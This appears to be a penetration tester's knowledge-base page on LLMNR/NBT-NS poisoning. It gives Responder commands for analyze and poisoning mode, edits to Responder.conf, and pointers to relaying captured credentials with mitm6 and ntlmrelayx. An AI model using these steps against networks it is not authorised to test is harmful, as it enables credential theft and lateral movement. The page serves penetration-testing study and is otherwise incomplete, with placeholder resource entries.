LLMNR NBT-NS Poisoning

Secondary Categories: 02-Credential Access, 02-Lateral Movement

Responder

When performing a internal network penetration test I usually start by running Responder in Analyze Mode to see if outdated protocols such as LLMNR and/or NBT-NS is utilized.

#Analyze Mode
responder -I eth0 -A
 
#Begin poisoning request
responder -I eth0

This can also be coupled with mitm6 to poison even more request.

Another great method is to utilize responder, mitm6, and ntlmrelayx to capture and relay credentials

If we are able to leverage LLMNR and NBT-NS then we can use other tools to further leverage this, but first we need to edit the Responder.conf file that is located at /usr/share/responder/Responder.conf

We need to change the SMB and HTTP from On to Off

# /usr/share/responder/Responder.conf
 
SQL = On
SMB = Off #   
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On

It is optional, but highly recommended to log hashes to a file in addition to the method or tactic used during ntlmrelayx. You can log the hashes to a file use the -of flag in ntlmrelyx

Resources:

Title	URL
place	holder

Also Check Out:

PLACEHOLDER

The Void 🌌

Explorer

LLMNR NBT-NS Poisoning

Responder

Resources:

Also Check Out:

Graph View

Backlinks

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer

Explorer

Table of Contents

Recent Blog Posts

No More Network Bottlenecks

Unmasking Secrets - Deciphering Encrypted Passwords through Reverse Engineering

Conquering Goliath as a CCDC Blue Teamer